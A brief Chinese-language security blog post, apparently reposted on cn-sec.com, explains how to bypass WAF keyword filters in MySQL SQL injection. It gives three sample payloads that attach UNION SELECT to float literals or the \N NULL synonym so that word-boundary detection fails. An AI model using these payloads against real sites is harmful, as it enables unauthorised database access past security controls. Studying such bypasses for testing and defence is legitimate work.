通用的关于sql注入的绕过waf的技巧(利用mysql的特性)

admin 2022年3月17日07:32:08评论66 views字数 536阅读1分47秒阅读模式

直接上语法

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=Nunion select 1,2,3,4,5,6,7,8,9,0

因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。

另外根据官方文档我们可以看到N其实相当于NULL字符,利用这个特性可以绕过很多waf。

9.1.7 NULL Values
The NULL value means “no data.” NULL can be written in any lettercase. A synonym is N (case sensitive).

原文地址: http://www.codefrom.com/paper/通用的关于sql注入的绕过waf的技巧(利用mysql的特性)

本文始发于微信公众号(关注安全技术):通用的关于sql注入的绕过waf的技巧(利用mysql的特性)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月17日07:32:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通用的关于sql注入的绕过waf的技巧(利用mysql的特性)http://cn-sec.com/archives/503299.html

发表评论

匿名网友 填写信息